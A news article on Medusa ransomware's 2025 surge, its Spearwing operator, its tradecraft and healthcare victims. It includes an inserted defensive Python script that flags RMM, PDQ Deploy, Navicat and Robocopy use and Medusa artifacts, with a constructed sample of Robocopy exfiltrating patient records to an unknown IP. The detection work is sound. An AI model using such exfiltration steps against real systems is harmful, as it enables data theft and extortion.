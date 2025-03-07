Medusa ransomware has claimed over 40 victims in the first two months of 2025, including a confirmed attack on a US healthcare organization.

This is almost twice the number of Medusa attacks observed in January and February 2024, according to new analysis by Symantec's threat hunting team.

The cybersecurity firm believes the true number of victims is likely much higher, since the findings do not account for victims who paid a ransom to stop their stolen data being published.

In total, Medusa has listed almost 400 victims on its data leak site since first becoming active in early 2023.

Ransoms demanded by attackers using the Medusa ransomware have ranged from $100,000 up to $15m.

The number of victims claimed by Medusa has increased over the past 12 months. The ransomware operators have likely taken advantage of the decline of big-name ransomware-as-a-service (RaaS) groups such as BlackCat and LockBit following law enforcement action in 2023 and 2024.

Medusa is believed to be operated as a RaaS by a group Symantec tracks as Spearwing.

The current Medusa ransomware is distinct from the older MedusaLocker variant, to which Spearwing is not believed to have any link.

How Medusa Attackers Operate

Medusa uses double-extortion tactics, stealing victims’ data before encrypting networks in order to increase the pressure on victims to pay a ransom.

The researchers believe that Spearwing and its affiliates usually gain initial access by exploiting unpatched vulnerabilities in public-facing applications, particularly Microsoft Exchange Servers.

They then deploy a variety of living-off-the-land and legitimate tools to evade detection, move laterally and exfiltrate data before encrypting systems.

These include:

Remote monitoring and management (RMM) software such as SimpleHelp or AnyDesk, used among other things to download drivers

The software deployment tool PDQ Deploy, used to drop other tools and move laterally across the victim network

The Bring Your Own Vulnerable Driver (BYOVD) technique, in which the attackers deploy a legitimately signed but vulnerable driver to the target network and then exploit it to disable security software and evade detection

Tools used to search for and copy data of interest ahead of exfiltration, such as the database client Navicat and the Windows copy utility Robocopy

Once the ransomware is executed, the .medusa extension is added to encrypted files and a ransom note named !READ_ME_MEDUSA!!!.txt is dropped on encrypted machines.
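The tooling list and the on-disk artifacts described above translate directly into hunting logic. The following Python script is an added example, not code from Symantec's report or from this article: it runs over constructed process-creation records (the kind of fields Sysmon event 1 or EDR telemetry would carry) and a constructed file listing, flagging the report's legitimate tools when run by non-allowlisted accounts, Robocopy jobs that push data to a network share outside a known set of hosts, and the .medusa extension and !READ_ME_MEDUSA!!!.txt note left by the encryptor. The process image substrings, the allowlist, the known-host set and every sample record are assumptions for illustration.

```python
"""Triage helpers for the Medusa/Spearwing tradecraft described above (added example).

Image-name substrings and all sample records below are constructed assumptions,
not indicators taken from a real incident; tune them to your own environment.
"""
import shlex
from dataclasses import dataclass

# Assumed image-name substrings for the tools named in the report.
TOOL_SIGNATURES = {
    "anydesk": "RMM (AnyDesk)",
    "simplehelp": "RMM (SimpleHelp)",
    "pdqdeploy": "deployment (PDQ Deploy)",
    "navicat": "database client (Navicat)",
    "robocopy": "bulk copy (Robocopy)",
}
RANSOM_NOTE = "!READ_ME_MEDUSA!!!.txt"   # ransom note name from the report
ENCRYPTED_EXT = ".medusa"                 # extension added to encrypted files


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record."""
    host: str
    user: str
    image: str
    cmdline: str


def flag_tool_usage(events, allowlist=frozenset()):
    """(host, user, label, image) for tool matches not run by an allowlisted account."""
    hits = []
    for ev in events:
        if ev.user.lower() in allowlist:
            continue
        name = ev.image.rsplit("\\", 1)[-1].lower()
        for needle, label in TOOL_SIGNATURES.items():
            if needle in name:
                hits.append((ev.host, ev.user, label, ev.image))
    return hits


def flag_exfil_copies(events, known_hosts=frozenset()):
    """Robocopy jobs whose destination is a UNC share on a host not in known_hosts.

    Robocopy syntax is `robocopy <source> <destination> [files...] [/options]`, so the
    destination is the second positional (non-slash) argument. Non-POSIX shlex keeps
    Windows backslashes intact; surrounding quotes are stripped afterwards.
    """
    suspects = []
    for ev in events:
        if "robocopy" not in ev.image.lower():
            continue
        positional = [t.strip('"') for t in shlex.split(ev.cmdline, posix=False)
                      if not t.startswith("/")]
        if len(positional) < 3:
            continue
        dest = positional[2]
        if dest.startswith("\\\\"):
            host = dest[2:].split("\\", 1)[0].lower()
            if host not in known_hosts:
                suspects.append((ev.host, ev.user, host))
    return suspects


def find_encryption_artifacts(paths):
    """Summarise ransom notes, encrypted-file count and affected directories in a listing."""
    notes, encrypted, dirs = [], 0, set()
    for p in paths:
        directory, _, name = p.rpartition("\\")
        if name == RANSOM_NOTE:
            notes.append(p)
            dirs.add(directory)
        elif name.lower().endswith(ENCRYPTED_EXT):
            encrypted += 1
            dirs.add(directory)
    return {"ransom_notes": notes, "encrypted_count": encrypted, "affected_dirs": sorted(dirs)}


# Constructed sample telemetry (not from a real incident).
SAMPLE_EVENTS = [
    ProcessEvent("FS01", "CORP\\svc_backup", r"C:\Windows\System32\robocopy.exe",
                 r"robocopy.exe D:\Shares\Finance \\backup01\nightly /MIR"),
    ProcessEvent("WS17", "CORP\\jdoe", r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe", "AnyDesk.exe"),
    ProcessEvent("DB02", "CORP\\admin7", r"C:\Tools\Navicat\navicat.exe", "navicat.exe"),
    ProcessEvent("WS03", "CORP\\rgreen", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 "WINWORD.EXE"),
    ProcessEvent("FS01", "CORP\\admin7", r"C:\Windows\System32\robocopy.exe",
                 r'robocopy.exe "E:\Patient Records" \\10.0.0.99\x /E /Z'),
]
SAMPLE_FILES = [
    r"D:\Shares\Finance\Q4.xlsx.medusa",
    r"D:\Shares\Finance\!READ_ME_MEDUSA!!!.txt",
    r"D:\Shares\HR\policy.docx",
    r"D:\Shares\HR\!READ_ME_MEDUSA!!!.txt",
    r"D:\Shares\HR\contracts.pdf.medusa",
    r"D:\Shares\IT\inventory.csv",
]

if __name__ == "__main__":
    for hit in flag_tool_usage(SAMPLE_EVENTS, allowlist=frozenset({"corp\\svc_backup"})):
        print("tool:", hit)
    for s in flag_exfil_copies(SAMPLE_EVENTS, known_hosts=frozenset({"backup01"})):
        print("copy to unknown share:", s)
    print(find_encryption_artifacts(SAMPLE_FILES))
```

The two allowlists matter: Robocopy and RMM software are legitimate in most environments, so the signal comes from who runs them and where data goes, not from the tool name alone. The scheduled backup account copying to the known backup host is deliberately left unflagged, while the same utility pushing a patient-records share to an unknown IP is reported.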

The ransom amount demanded varies depending on the victims, who are given 10 days to pay and are charged $10,000 per day if they want to extend this deadline.

Medusa can also delete itself from victim machines once the ransomware has executed, making it harder for investigators to determine the source of the attack.

The Symantec researchers said that Medusa's TTPs have remained consistent since early 2023. This suggests that Spearwing works with a small number of affiliates and provides them with a playbook setting out how attacks should be carried out and which attack chain to use.

Medusa Ransomware Attacks on Healthcare

Symantec highlighted a Medusa attack on an unnamed US healthcare organization in January 2025, which infected hundreds of machines.

The attackers were first active on the network four days before the ransomware was deployed, in line with the broader trend of longer dwell times spent identifying data worth exfiltrating.

The researchers found indications of “hands-on-keyboard activity” rather than it being an automated attack.

In a separate analysis, consumer website Comparitech reported that seven of the 959 confirmed ransomware attacks in February impacted healthcare.

Comparitech found that Medusa was responsible for three of the seven healthcare attacks, two in the US and one in the UK.